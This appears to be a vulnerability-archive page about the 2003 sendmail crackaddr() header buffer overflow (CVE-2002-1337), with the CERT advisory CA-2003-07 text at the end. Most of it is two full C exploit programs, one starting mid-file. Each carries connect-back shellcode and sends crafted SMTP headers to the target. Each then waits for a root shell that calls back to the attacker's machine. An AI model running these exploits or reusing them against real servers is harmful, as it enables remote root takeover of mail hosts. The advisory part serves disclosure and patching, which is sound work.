
#define MAXLINE 2048
#define PNUM    12

#define OFF1 (288+156-12)
#define OFF2 (1088+288+156+20+48)
#define OFF3 (139*2)

int tab[]={23,24,25,26};

#define IDX2PTR(i) (PTR+i-OFF1)
#define ALLOCBLOCK(idx,size) memset(&lookup[idx],1,size)

#define NOTVALIDCHAR(c) (((c)==0x00)||((c)==0x0d)||((c)==0x0a)||((c)==0x22)||\
                        (((c)&0x7f)==0x24)||(((c)>=0x80)&&((c)<0xa0)))

#define AOFF 33
#define AMSK 38
#define POFF 48
#define PMSK 53

char* lookup=NULL;
int   gfirst;

char shellcode[]=               /* 116 bytes                      */
    "\xeb\x02"                  /* jmp    <shellcode+4>           */
    "\xeb\x08"                  /* jmp    <shellcode+12>          */
    "\xe8\xf9\xff\xff\xff"      /* call   <shellcode+2>           */
    "\xcd\x7f"                  /* int    $0x7f                   */
    "\xc3"                      /* ret                            */
    "\x5f"                      /* pop    %edi                    */
    "\xff\x47\x01"              /* incl   0x1(%edi)               */
    "\x31\xc0"                  /* xor    %eax,%eax               */
    "\x50"                      /* push   %eax                    */
    "\x6a\x01"                  /* push   $0x1                    */
    "\x6a\x02"                  /* push   $0x2                    */
    "\x54"                      /* push   %esp                    */
    "\x59"                      /* pop    %ecx                    */
    "\xb0\x66"                  /* mov    $0x66,%al               */
    "\x31\xdb"                  /* xor    %ebx,%ebx               */
    "\x43"                      /* inc    %ebx                    */
    "\xff\xd7"                  /* call   *%edi                   */
    "\xba\xff\xff\xff\xff"      /* mov    $0xffffffff,%edx        */
    "\xb9\xff\xff\xff\xff"      /* mov    $0xffffffff,%ecx        */
    "\x31\xca"                  /* xor    %ecx,%edx               */
    "\x52"                      /* push   %edx                    */
    "\xba\xfd\xff\xff\xff"      /* mov    $0xfffffffd,%edx        */
    "\xb9\xff\xff\xff\xff"      /* mov    $0xffffffff,%ecx        */
    "\x31\xca"                  /* xor    %ecx,%edx               */
    "\x52"                      /* push   %edx                    */
    "\x54"                      /* push   %esp                    */
    "\x5e"                      /* pop    %esi                    */
    "\x6a\x10"                  /* push   $0x10                   */
    "\x56"                      /* push   %esi                    */
    "\x50"                      /* push   %eax                    */
    "\x50"                      /* push   %eax                    */
    "\x5e"                      /* pop    %esi                    */
    "\x54"                      /* push   %esp                    */
    "\x59"                      /* pop    %ecx                    */
    "\xb0\x66"                  /* mov    $0x66,%al               */
    "\x6a\x03"                  /* push   $0x3                    */
    "\x5b"                      /* pop    %ebx                    */
    "\xff\xd7"                  /* call   *%edi                   */
    "\x56"                      /* push   %esi                    */
    "\x5b"                      /* pop    %ebx                    */
    "\x31\xc9"                  /* xor    %ecx,%ecx               */
    "\xb1\x03"                  /* mov    $0x3,%cl                */
    "\x31\xc0"                  /* xor    %eax,%eax               */
    "\xb0\x3f"                  /* mov    $0x3f,%al               */
    "\x49"                      /* dec    %ecx                    */
    "\xff\xd7"                  /* call   *%edi                   */
    "\x41"                      /* inc    %ecx                    */
    "\xe2\xf6"                  /* loop   <shellcode+81>          */
    "\x31\xc0"                  /* xor    %eax,%eax               */
    "\x50"                      /* push   %eax                    */
    "\x68\x2f\x2f\x73\x68"      /* push   $0x68732f2f             */
    "\x68\x2f\x62\x69\x6e"      /* push   $0x6e69622f             */
    "\x54"                      /* push   %esp                    */
    "\x5b"                      /* pop    %ebx                    */
    "\x50"                      /* push   %eax                    */
    "\x53"                      /* push   %ebx                    */
    "\x54"                      /* push   %esp                    */
    "\x59"                      /* pop    %ecx                    */
    "\x31\xd2"                  /* xor    %edx,%edx               */
    "\xb0\x0b"                  /* mov    $0xb,%al                */
    "\xff\xd7"                  /* call   *%edi                   */
;

int PTR,MPTR=0xbfffa01c;

void putaddr(char* p,int i) {
 *p++=(i&0xff);
 *p++=((i>>8)&0xff);
 *p++=((i>>16)&0xff);
 *p++=((i>>24)&0xff);
}

void sendcommand(int sck,char *data,char resp) {
 char buf[1024];
 int i;
 if (send(sck,data,strlen(data),0)<0) {
  perror("error");exit(-1);
 }
 if (resp) {
  if ((i=recv(sck,buf,sizeof(buf),0))<0) {
   perror("error");exit(-1);
  }
  buf[i]=0;
  printf("%s",buf);
 }
}

int rev(int a){
 int i=1;
 if((*(char*)&i)) return(a);
 return((a>>24)&0xff)|(((a>>16)&0xff)<<8)|(((a>>8)&0xff)<<16)|((a&0xff)<<24);
}

void initlookup() {
 int i;
 if (!(lookup=(char*)malloc(MAXLINE))) {
  printf("error: malloc\n");exit(-1);
 }
 ALLOCBLOCK(0,MAXLINE);
 memset(lookup+OFF1,0,OFF2-OFF1);

 for(i=0;i<sizeof(tab)/4;i++)
  ALLOCBLOCK(OFF1+4*tab[i],4);

 gfirst=1;
}

int validaddr(int addr) {
 unsigned char buf[4],c;
 int i,*p=(int*)buf;
 *p=addr;
 for(i=0;i<4;i++) {
  c=buf[i];
  if (NOTVALIDCHAR(c)) return 0;
 }
 return 1;
}

int freeblock(int idx,int size) {
 int i,j;
 for(i=j=0;i<size;i++) {
  if (!lookup[idx+i]) j++;
 }
 return (i==j);
}

int findblock(int addr,int size,int begin) {
 int i,j,idx,ptr;
 ptr=addr;
 if (begin) {
  idx=OFF1+addr-PTR;
  while(1) {
   while(((!validaddr(ptr))||lookup[idx])&&(idx<OFF2)) {
    idx+=4;
    ptr+=4;
   }
   if (idx>=OFF2) return 0;
   if (freeblock(idx,size)) return idx;
   idx+=4;
   ptr+=4;
  }
 } else {
  idx=addr-PTR;
  while(1) {
   while(((!validaddr(ptr))||lookup[idx])&&(idx>OFF1)) {
    idx-=4;
    ptr-=4;
   }
   if (idx<OFF1) return 0;
   if (freeblock(idx,size)) return idx;
   idx-=4;
   ptr-=4;
  }
 }
}

int findsblock(int sptr) {
 int optr,sidx,size;

 size=gfirst ? 0x2c:0x04;
 optr=sptr;
 while(sidx=findblock(sptr,size,1)) {
  sptr=IDX2PTR(sidx);
  if (gfirst) {
   if (validaddr(sptr)) {
    ALLOCBLOCK(sidx,size);
    break;
   } else sptr=optr;
  } else {
   if (validaddr(sptr-0x18)&&freeblock(sidx-0x18,4)&&freeblock(sidx+0x0c,4)&&
       freeblock(sidx+0x10,4)&&freeblock(sidx-0x0e,4)) {
    ALLOCBLOCK(sidx-0x18,4);
    ALLOCBLOCK(sidx-0x0e,2);
    ALLOCBLOCK(sidx,4);
    ALLOCBLOCK(sidx+0x0c,4);
    ALLOCBLOCK(sidx+0x10,4);
    sidx-=0x18;
    break;
   } else sptr=optr;
  }
  sptr+=4;
  optr=sptr;
  }
 gfirst=0;
 return sidx;
}

int findfblock(int fptr,int i1,int i2,int i3) {
 int fidx,optr;
 optr=fptr;
 while(fidx=findblock(fptr,4,0)) {
  fptr=IDX2PTR(fidx);
  if (validaddr(fptr-i2)&&validaddr(fptr-i2-i3)&&freeblock(fidx-i3,4)&&
      freeblock(fidx-i2-i3,4)&&freeblock(fidx-i2-i3+i1,4)) {
   ALLOCBLOCK(fidx,4);
   ALLOCBLOCK(fidx-i3,4);
   ALLOCBLOCK(fidx-i2-i3,4);
   ALLOCBLOCK(fidx-i2-i3+i1,4);
   break;
  } else fptr=optr;
  fptr-=4;
  optr=fptr;
 }
 return fidx;
}

void findvalmask(char* val,char* mask,int len) {
 int i;
 unsigned char c,m;
 for(i=0;i<len;i++) {
  c=val[i];
  m=0xff;
  while(NOTVALIDCHAR(c^m)||NOTVALIDCHAR(m)) m--;
  val[i]=c^m;
  mask[i]=m;
 }
}

void initasmcode(char *addr,int port) {
 char abuf[4],amask[4],pbuf[2],pmask[2];
 char name[256];
 struct hostent *hp;
 int i;

 if (!addr) gethostname(name,sizeof(name));
  else strcpy(name,addr);

 if ((i=inet_addr(name))==-1) {
  if ((hp=gethostbyname(name))==NULL) {
   printf("error: address\n");exit(-1);
  }
  memcpy(&i,hp->h_addr,4);
 }

 putaddr(abuf,rev(i));

 pbuf[0]=(port>>8)&0xff;
 pbuf[1]=(port)&0xff;

 findvalmask(abuf,amask,4);
 findvalmask(pbuf,pmask,2);

 memcpy(&shellcode[AOFF],abuf,4);
 memcpy(&shellcode[AMSK],amask,4);
 memcpy(&shellcode[POFF],pbuf,2);
 memcpy(&shellcode[PMSK],pmask,2);
}

int main(int argc,char **argv){
    int sck,srv,i,j,cnt,jidx,aidx,sidx,fidx,aptr,sptr,fptr,ssize,fsize,jmp;
    int c,l,i1,i2,i3,i4,found,vers=80,count=256,timeout=1,port=25;
    fd_set readfs;
    struct timeval t;
    struct sockaddr_in address;
    struct hostent *hp;
    char buf[4096],cmd[4096];
    char *p,*host,*myhost=NULL;

    printf("copyright LAST STAGE OF DELIRIUM mar 2003 poland //lsd-pl.net/\n");
    printf("sendmail 8.11.6 for Slackware 8.0 x86\n\n");

    if (argc<3) {
     printf("usage: %s target [-l localaddr] [-b localport] [-p ptr] [-c count] [-t timeout] [-v 80]\n",argv[0]);
     exit(-1);
    }

    while((c=getopt(argc-1,&argv[1],"b:c:l:p:t:v:"))!=-1) {
     switch(c) {
      case 'b': port=atoi(optarg);break;
      case 'c': count=atoi(optarg);break;
      case 'l': myhost=optarg;break;
      case 't': timeout=atoi(optarg);break;
      case 'v': vers=atoi(optarg);break;
      case 'p': sscanf(optarg,"%x",&MPTR);
     }
    }

    host=argv[1];

    srv=socket(AF_INET,SOCK_STREAM,0);
    bzero(&address,sizeof(address));
    address.sin_family=AF_INET;
    address.sin_port=htons(port);
    if (bind(srv,(struct sockaddr*)&address,sizeof(address))==-1) {
     printf("error: bind\n");exit(-1);
    }
    if (listen(srv,10)==-1) {
     printf("error: listen\n");exit(-1);
    }

    initasmcode(myhost,port);

    for(i4=0;i4<count;i4++,MPTR+=cnt*4) {
     PTR=MPTR;
     sck=socket(AF_INET,SOCK_STREAM,0);
     bzero(&address,sizeof(address));
     address.sin_family=AF_INET;
     address.sin_port=htons(25);
     if ((address.sin_addr.s_addr=inet_addr(host))==-1) {
      if ((hp=gethostbyname(host))==NULL) {
       printf("error: address\n");exit(-1);
      }
      memcpy(&address.sin_addr.s_addr,hp->h_addr,4);
     }
     if (connect(sck,(struct sockaddr*)&address,sizeof(address))==-1) {
      printf("error: connect\n");exit(-1);
     }
     initlookup();

     sendcommand(sck,"helo yahoo.com\n",0);
     sendcommand(sck,"mail from: anonymous@yahoo.com\n",0);
     sendcommand(sck,"rcpt to: lp\n",0);
     sendcommand(sck,"data\n",0);

     aidx=findblock(PTR,PNUM*4,1);
     ALLOCBLOCK(aidx,PNUM*4);
     aptr=IDX2PTR(aidx);

     printf(".");fflush(stdout);

     jidx=findblock(PTR,strlen(shellcode)+PNUM*4,1);
     ALLOCBLOCK(jidx,strlen(shellcode)+PNUM*4);

     switch(vers) {
      case 80: l=28;i1=0x46;i2=0x94;i3=0x1c;break;
      default: exit(-1);
     }

     i2-=8;

     p=buf;
     for(i=0;i<138;i++) {
      *p++='<';*p++='>';
     }
     *p++='(';
     for(i=0;i<l;i++) *p++=NOP;
     *p++=')';
     *p++=0;

     putaddr(&buf[OFF3+l],aptr);
     sprintf(cmd,"From: %s\n",buf);
     sendcommand(sck,cmd,0);
     sendcommand(sck,"Subject: hello\n",0);
     memset(cmd,NOP,MAXLINE);
     cmd[MAXLINE-2]='\n';
     cmd[MAXLINE-1]=0;

     cnt=0;

     while(cnt<PNUM) {
      sptr=aptr;
      fptr=IDX2PTR(OFF2);

      if (!(sidx=findsblock(sptr))) break;
      sptr=IDX2PTR(sidx);
      if (!(fidx=findfblock(fptr,i1,i2,i3))) break;
      fptr=IDX2PTR(fidx);

      jmp=IDX2PTR(jidx);
      while (!validaddr(jmp)) jmp+=4;

      putaddr(&cmd[aidx],sptr);
      putaddr(&cmd[sidx+0x24],aptr);
      putaddr(&cmd[sidx+0x28],aptr);
      putaddr(&cmd[sidx+0x18],fptr-i2-i3);

      putaddr(&cmd[fidx-i2-i3],0x01010101);
      putaddr(&cmd[fidx-i2-i3+i1],0xfffffff8);

      putaddr(&cmd[fidx-i3],fptr-i3);
      putaddr(&cmd[fidx],jmp);

      aidx+=4;
      PTR-=4;
      cnt++;
     }

     p=&cmd[jidx+4*PNUM];
      for(i=0;i<strlen(shellcode);i++) {
      *p++=shellcode[i];
     }
     sendcommand(sck,cmd,0);
     sendcommand(sck,"\n",0);
     sendcommand(sck,".\n",0);
     free(lookup);

     FD_ZERO(&readfs);
     FD_SET(0,&readfs);
     FD_SET(srv,&readfs);

     t.tv_sec=timeout;
     t.tv_usec=0;

     if (select(srv+1,&readfs,NULL,NULL,&t)>0) {
      close(sck);
      found=1;
      if ((sck=accept(srv,(struct sockaddr*)&address,&l))==-1) {
        printf("error: accept\n");exit(-1);
      }
      close(srv);

      printf("\nbase 0x%08x mcicache 0x%08x\n",PTR,aptr);

      write(sck,"/bin/uname -a\n",14);
     } else {
      close(sck);
      found=0;
     }

     while(found){
        FD_ZERO(&readfs);
        FD_SET(0,&readfs);
        FD_SET(sck,&readfs);
        if(select(sck+1,&readfs,NULL,NULL,NULL)){
            int cnt;
            char buf[1024];
            if(FD_ISSET(0,&readfs)){
                if((cnt=read(0,buf,1024))<1){
                    if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
                     else {printf("koniec\n");exit(-1);}
                }
                write(sck,buf,cnt);
            }
            if(FD_ISSET(sck,&readfs)){
                if((cnt=read(sck,buf,1024))<1){
                     if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
                     else {printf("koniec\n");exit(-1);}
                }
                write(1,buf,cnt);
            }
        }
    }
  }
}
		

- 漏洞信息 (22314)

Sendmail 8.12.x Header Processing Buffer Overflow Vulnerability (2) (EDBID:22314)
unix remote
2003-03-02 Verified
0 bysin
N/A [点击下载]
source: http://www.securityfocus.com/bid/6991/info
 
Sendmail is prone to a remotely buffer-overflow vulnerability in the SMTP header parsing component. Successful attackers may exploit this vulnerability to gain control of affected servers.
 
Reportedly, this vulnerability may be locally exploitable if the sendmail binary is setuid/setgid.
 
Sendmail 5.2 to 8.12.7 are affected. Administrators are advised to upgrade to 8.12.8 or to apply patches to earlier versions of the 8.12.x tree. 

/* Sendmail <8.12.8 crackaddr() exploit by bysin */
/*            from the l33tsecurity crew         */

#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <unistd.h>
#include <netdb.h>
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>

int maxarch=1;
struct arch {
	char *os;
	int angle,nops;
	unsigned long aptr;
} archs[] = {
	{"Slackware 8.0 with sendmail 8.11.4",138,1,0xbfffbe34}
};


/////////////////////////////////////////////////////////

#define LISTENPORT 2525
#define BUFSIZE 4096

char code[]=                    /* 116 bytes                      */
    "\xeb\x02"                  /* jmp    <shellcode+4>           */
    "\xeb\x08"                  /* jmp    <shellcode+12>          */
    "\xe8\xf9\xff\xff\xff"      /* call   <shellcode+2>           */
    "\xcd\x7f"                  /* int    $0x7f                   */
    "\xc3"                      /* ret                            */
    "\x5f"                      /* pop    %edi                    */
    "\xff\x47\x01"              /* incl   0x1(%edi)               */
    "\x31\xc0"                  /* xor    %eax,%eax               */
    "\x50"                      /* push   %eax                    */
    "\x6a\x01"                  /* push   $0x1                    */
    "\x6a\x02"                  /* push   $0x2                    */
    "\x54"                      /* push   %esp                    */
    "\x59"                      /* pop    %ecx                    */
    "\xb0\x66"                  /* mov    $0x66,%al               */
    "\x31\xdb"                  /* xor    %ebx,%ebx               */
    "\x43"                      /* inc    %ebx                    */
    "\xff\xd7"                  /* call   *%edi                   */
    "\xba\xff\xff\xff\xff"      /* mov    $0xffffffff,%edx        */
    "\xb9\xff\xff\xff\xff"      /* mov    $0xffffffff,%ecx        */
    "\x31\xca"                  /* xor    %ecx,%edx               */
    "\x52"                      /* push   %edx                    */
    "\xba\xfd\xff\xff\xff"      /* mov    $0xfffffffd,%edx        */
    "\xb9\xff\xff\xff\xff"      /* mov    $0xffffffff,%ecx        */
    "\x31\xca"                  /* xor    %ecx,%edx               */
    "\x52"                      /* push   %edx                    */
    "\x54"                      /* push   %esp                    */
    "\x5e"                      /* pop    %esi                    */
    "\x6a\x10"                  /* push   $0x10                   */
    "\x56"                      /* push   %esi                    */
    "\x50"                      /* push   %eax                    */
    "\x50"                      /* push   %eax                    */
    "\x5e"                      /* pop    %esi                    */
    "\x54"                      /* push   %esp                    */
    "\x59"                      /* pop    %ecx                    */
    "\xb0\x66"                  /* mov    $0x66,%al               */
    "\x6a\x03"                  /* push   $0x3                    */
    "\x5b"                      /* pop    %ebx                    */
    "\xff\xd7"                  /* call   *%edi                   */
    "\x56"                      /* push   %esi                    */
    "\x5b"                      /* pop    %ebx                    */
    "\x31\xc9"                  /* xor    %ecx,%ecx               */
    "\xb1\x03"                  /* mov    $0x3,%cl                */
    "\x31\xc0"                  /* xor    %eax,%eax               */
    "\xb0\x3f"                  /* mov    $0x3f,%al               */
    "\x49"                      /* dec    %ecx                    */
    "\xff\xd7"                  /* call   *%edi                   */
    "\x41"                      /* inc    %ecx                    */
    "\xe2\xf6"                  /* loop   <shellcode+81>          */
    "\x31\xc0"                  /* xor    %eax,%eax               */
    "\x50"                      /* push   %eax                    */
    "\x68\x2f\x2f\x73\x68"      /* push   $0x68732f2f             */
    "\x68\x2f\x62\x69\x6e"      /* push   $0x6e69622f             */
    "\x54"                      /* push   %esp                    */
    "\x5b"                      /* pop    %ebx                    */
    "\x50"                      /* push   %eax                    */
    "\x53"                      /* push   %ebx                    */
    "\x54"                      /* push   %esp                    */
    "\x59"                      /* pop    %ecx                    */
    "\x31\xd2"                  /* xor    %edx,%edx               */
    "\xb0\x0b"                  /* mov    $0xb,%al                */
    "\xff\xd7"                  /* call   *%edi                   */
;


void header() {
	printf("\nSendmail <8.12.8 crackaddr() exploit by bysin\n");
	printf("           from the l33tsecurity crew        \n\n");
}

void printtargets() {
	unsigned long i;
	header();
	printf("\t  Target\t Addr\t\t OS\n");
	printf("\t-------------------------------------------\n");
	for (i=0;i<maxarch;i++) printf("\t* %d\t\t 0x%08x\t %s\n",i,archs[i].aptr,archs[i].os);
	printf("\n");
}

void writesocket(int sock, char *buf) {
	if (send(sock,buf,strlen(buf),0) <= 0) {
		printf("Error writing to socket\n");
		exit(0);
	}
}

void readsocket(int sock, int response) {
	char temp[BUFSIZE];
	memset(temp,0,sizeof(temp));
	if (recv(sock,temp,sizeof(temp),0) <= 0) {
		printf("Error reading from socket\n");
		exit(0);
	}
	if (response != atol(temp)) {
		printf("Bad response: %s\n",temp);
		exit(0);
	}
}

int readutil(int sock, int response) {
	char temp[BUFSIZE],*str;
	while(1) {
		fd_set readfs;
		struct timeval tm;
		FD_ZERO(&readfs);
		FD_SET(sock,&readfs);
		tm.tv_sec=1;
		tm.tv_usec=0;
		if(select(sock+1,&readfs,NULL,NULL,&tm) <= 0) return 0;
		memset(temp,0,sizeof(temp));
		if (recv(sock,temp,sizeof(temp),0) <= 0) {
			printf("Error reading from socket\n");
			exit(0);
		}
		str=(char*)strtok(temp,"\n");
		while(str && *str) {
			if (atol(str) == response) return 1;
			str=(char*)strtok(NULL,"\n");
		}
	}
}

#define NOTVALIDCHAR(c) (((c)==0x00)||((c)==0x0d)||((c)==0x0a)||((c)==0x22)||(((c)&0x7f)==0x24)||(((c)>=0x80)&&((c)<0xa0)))

void findvalmask(char* val,char* mask,int len) {
	int i;
	unsigned char c,m;
	for(i=0;i<len;i++) {
		c=val[i];
		m=0xff;
		while(NOTVALIDCHAR(c^m)||NOTVALIDCHAR(m)) m--;
		val[i]=c^m;
		mask[i]=m;
	}
}

void fixshellcode(char *host, unsigned short port) {
	unsigned long ip;
	char abuf[4],amask[4],pbuf[2],pmask[2];
	if ((ip = inet_addr(host)) == -1) {
		struct hostent *hostm;
		if ((hostm=gethostbyname(host)) == NULL) {
			printf("Unable to resolve local address\n");
			exit(0);
		}
		memcpy((char*)&ip, hostm->h_addr, hostm->h_length);
	}
	abuf[3]=(ip>>24)&0xff;
	abuf[2]=(ip>>16)&0xff;
	abuf[1]=(ip>>8)&0xff;
	abuf[0]=(ip)&0xff;
	pbuf[0]=(port>>8)&0xff;
	pbuf[1]=(port)&0xff;
	findvalmask(abuf,amask,4);
	findvalmask(pbuf,pmask,2);
	memcpy(&code[33],abuf,4);
	memcpy(&code[38],amask,4);
	memcpy(&code[48],pbuf,2);
	memcpy(&code[53],pmask,2);
}

void getrootprompt() {
	int sockfd,sin_size,tmpsock,i;
	struct sockaddr_in my_addr,their_addr;
	char szBuffer[1024];
	if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
		printf("Error creating listening socket\n");
		return;
	}
	my_addr.sin_family = AF_INET;
	my_addr.sin_port = htons(LISTENPORT);
	my_addr.sin_addr.s_addr = INADDR_ANY;
	memset(&(my_addr.sin_zero), 0, 8);
	if (bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr)) == -1) {
		printf("Error binding listening socket\n");
		return;
	}
	if (listen(sockfd, 1) == -1) {
		printf("Error listening on listening socket\n");
		return;
	}
	sin_size = sizeof(struct sockaddr_in);
	if ((tmpsock = accept(sockfd, (struct sockaddr *)&their_addr, &sin_size)) == -1) {
		printf("Error accepting on listening socket\n");
		return;
	}
	writesocket(tmpsock,"uname -a\n");
	while(1) {
		fd_set readfs;
		FD_ZERO(&readfs);
		FD_SET(0,&readfs);
		FD_SET(tmpsock,&readfs);
		if(select(tmpsock+1,&readfs,NULL,NULL,NULL)) {
			int cnt;
			char buf[1024];
			if (FD_ISSET(0,&readfs)) {
				if ((cnt=read(0,buf,1024)) < 1) {
					if(errno==EWOULDBLOCK || errno==EAGAIN) continue;
                			else {
						printf("Connection closed\n");
						return;
					}
				}
				write(tmpsock,buf,cnt);
			}
			if (FD_ISSET(tmpsock,&readfs)) {
				if ((cnt=read(tmpsock,buf,1024)) < 1) {
					if(errno==EWOULDBLOCK || errno==EAGAIN) continue;
                			else {
						printf("Connection closed\n");
						return;
					}
				}
				write(1,buf,cnt);
			}
		}
	}
	close(tmpsock);
	close(sockfd);
	return;
}

int main(int argc, char **argv) {
	struct sockaddr_in server;
	unsigned long ipaddr,i,bf=0;
	int sock,target;
	char tmp[BUFSIZE],buf[BUFSIZE],*p;
	if (argc <= 3) {
		printf("%s <target ip> <myip> <target number> [bruteforce start addr]\n",argv[0]);
		printtargets();
		return 0;
	}
	target=atol(argv[3]);
	if (target < 0 || target >= maxarch) {
		printtargets();
		return 0;
	}
	if (argc > 4) sscanf(argv[4],"%x",&bf);

	header();

	fixshellcode(argv[2],LISTENPORT);
	if (bf && !fork()) {
		getrootprompt();
		return 0;
	}

bfstart:
	if (bf) {
		printf("Trying address 0x%x\n",bf);
		fflush(stdout);
	}
	if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
		printf("Unable to create socket\n");
		exit(0);
	}
	server.sin_family = AF_INET;
	server.sin_port = htons(25);
	if (!bf) {
		printf("Resolving address... ");
		fflush(stdout);
	}
	if ((ipaddr = inet_addr(argv[1])) == -1) {
		struct hostent *hostm;
		if ((hostm=gethostbyname(argv[1])) == NULL) {
			printf("Unable to resolve address\n");
			exit(0);
		}
		memcpy((char*)&server.sin_addr, hostm->h_addr, hostm->h_length);
	}
	else server.sin_addr.s_addr = ipaddr;
	memset(&(server.sin_zero), 0, 8);
	if (!bf) {
		printf("Address found\n");
		printf("Connecting... ");
		fflush(stdout);
	}
	if (connect(sock,(struct sockaddr *)&server, sizeof(server)) != 0) {
		printf("Unable to connect\n");
		exit(0);
	}
	if (!bf) {
		printf("Connected!\n");
		printf("Sending exploit... ");
		fflush(stdout);
	}
	readsocket(sock,220);
	writesocket(sock,"HELO yahoo.com\r\n");
	readsocket(sock,250);
	writesocket(sock,"MAIL FROM: spiderman@yahoo.com\r\n");
	readsocket(sock,250);
	writesocket(sock,"RCPT TO: MAILER-DAEMON\r\n");
	readsocket(sock,250);
	writesocket(sock,"DATA\r\n");
	readsocket(sock,354);
	memset(buf,0,sizeof(buf));
	p=buf;
	for (i=0;i<archs[target].angle;i++) {
		*p++='<';
		*p++='>';
	}
	*p++='(';
	for (i=0;i<archs[target].nops;i++) *p++=0xf8;
	*p++=')';
	*p++=((char*)&archs[target].aptr)[0];
	*p++=((char*)&archs[target].aptr)[1];
	*p++=((char*)&archs[target].aptr)[2];
	*p++=((char*)&archs[target].aptr)[3];
	*p++=0;
	sprintf(tmp,"Full-name: %s\r\n",buf);
	writesocket(sock,tmp);
	sprintf(tmp,"From: %s\r\n",buf);
	writesocket(sock,tmp);

	p=buf;
	archs[target].aptr+=4;
	*p++=((char*)&archs[target].aptr)[0];
	*p++=((char*)&archs[target].aptr)[1];
	*p++=((char*)&archs[target].aptr)[2];
	*p++=((char*)&archs[target].aptr)[3];

	for (i=0;i<0x14;i++) *p++=0xf8;
	archs[target].aptr+=0x18;
	*p++=((char*)&archs[target].aptr)[0];
	*p++=((char*)&archs[target].aptr)[1];
	*p++=((char*)&archs[target].aptr)[2];
	*p++=((char*)&archs[target].aptr)[3];

	for (i=0;i<0x4c;i++) *p++=0x01;
	archs[target].aptr+=0x4c+4;
	*p++=((char*)&archs[target].aptr)[0];
	*p++=((char*)&archs[target].aptr)[1];
	*p++=((char*)&archs[target].aptr)[2];
	*p++=((char*)&archs[target].aptr)[3];

	for (i=0;i<0x8;i++) *p++=0xf8;
	archs[target].aptr+=0x08+4;
	*p++=((char*)&archs[target].aptr)[0];
	*p++=((char*)&archs[target].aptr)[1];
	*p++=((char*)&archs[target].aptr)[2];
	*p++=((char*)&archs[target].aptr)[3];

	for (i=0;i<0x20;i++) *p++=0xf8;
	for (i=0;i<strlen(code);i++) *p++=code[i];

	*p++=0;
	sprintf(tmp,"Subject: AAAAAAAAAAA%s\r\n",buf);
	writesocket(sock,tmp);
	writesocket(sock,".\r\n");
	if (!bf) {
		printf("Exploit sent!\n");
		printf("Waiting for root prompt...\n");
		if (readutil(sock,451)) printf("Failed!\n");
		else getrootprompt();
	}
	else {
		readutil(sock,451);
		close(sock);
		bf+=4;
		goto bfstart;
	}
}


		

- 漏洞信息 (F30866)

CA-2003-07.sendmail (PacketStormID:F30866)
2003-03-04 00:00:00
 
remote,root
CVE-2002-1337
[点击下载]

CERT Advisory CA-2003-07 - Sendmail prior to 8.12.8 has a remote root vulnerability which can be exploited by a malicious mail message, allowing non-vulnerable MTA's to relay the exploit message to unpatched MTA's on an internal network. A successful attack against an unpatched sendmail system will not leave any messages in the logs. All Sendmail Pro, Sendmail Switch, and Sendmail for NT are also vulnerable. Fix available here.

-----BEGIN PGP SIGNED MESSAGE-----

CERT Advisory CA-2003-07 Remote Buffer Overflow in Sendmail

   Original release date: March 3, 2003
   Last revised: --
   Source: CERT/CC

   A complete revision history can be found at the end of this file.

Systems Affected

     * Sendmail Pro (all versions)
     * Sendmail Switch 2.1 prior to 2.1.5
     * Sendmail Switch 2.2 prior to 2.2.5
     * Sendmail Switch 3.0 prior to 3.0.3
     * Sendmail for NT 2.X prior to 2.6.2
     * Sendmail for NT 3.0 prior to 3.0.3
     * Systems  running  open-source  sendmail  versions prior to 8.12.8,
       including UNIX and Linux systems

Overview

   There  is  a vulnerability in sendmail that may allow remote attackers
   to gain the privileges of the sendmail daemon, typically root.

I. Description

   Researchers  at  Internet  Security  Systems  (ISS)  have discovered a
   remotely  exploitable  vulnerability  in  sendmail. This vulnerability
   could  allow  an  intruder  to  gain  control of a vulnerable sendmail
   server.

   Most  organizations  have  a variety of mail transfer agents (MTAs) at
   various  locations  within their network, with at least one exposed to
   the   Internet.   Since   sendmail  is  the  most  popular  MTA,  most
   medium-sized  to  large  organizations are likely to have at least one
   vulnerable   sendmail   server.  In  addition,  many  UNIX  and  Linux
   workstations  provide  a  sendmail  implementation that is enabled and
   running by default.

   This    vulnerability    is    message-oriented    as    opposed    to
   connection-oriented. That means that the vulnerability is triggered by
   the  contents  of  a  specially-crafted  email  message rather than by
   lower-level  network  traffic.  This  is important because an MTA that
   does  not  contain  the  vulnerability will pass the malicious message
   along  to  other  MTAs  that may be protected at the network level. In
   other  words, vulnerable sendmail servers on the interior of a network
   are  still  at risk, even if the site's border MTA uses software other
   than sendmail. Also, messages capable of exploiting this vulnerability
   may pass undetected through many common packet filters or firewalls.

   Sendmail has indicated to the CERT/CC that this vulnerability has been
   successfully  exploited in a laboratory environment. We do not believe
   that   this   exploit  is  available  to  the  public.  However,  this
   vulnerability  is  likely  to  draw  significant  attention  from  the
   intruder community, so the probability of a public exploit is high.

   A  successful  attack  against  an  unpatched sendmail system will not
   leave any messages in the system log. However, on a patched system, an
   attempt  to  exploit  this  vulnerability will leave the following log
   message:

     Dropped invalid comments from header address

   Although  this does not represent conclusive evidence of an attack, it
   may be useful as an indicator.

   A  patched  sendmail server will drop invalid headers, thus preventing
   downstream servers from receiving them.

   The CERT/CC is tracking this issue as VU#398025. This reference number
   corresponds to CVE candidate CAN-2002-1337.

   For more information, please see

       http://www.sendmail.org
       http://www.sendmail.org/8.12.8.html
       http://www.sendmail.com/security/
       http://www.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21950
       http://www.kb.cert.org/vuls/id/398025

II. Impact

   Successful exploitation of this vulnerability may allow an attacker to
   gain  the  privileges  of  the  sendmail  daemon, typically root. Even
   vulnerable  sendmail servers on the interior of a given network may be
   at  risk  since  the vulnerability is triggered from the contents of a
   malicious email message.

III. Solution

Apply a patch from Sendmail

   Sendmail  has produced patches for versions 8.9, 8.10, 8.11, and 8.12.
   However,  the  vulnerability  also  exists  in earlier versions of the
   code;  therefore,  site  administrators  using  an earlier version are
   encouraged to upgrade to 8.12.8. These patches are located at

       ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.12.security.cr.patch
       ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.11.6.security.cr.patch
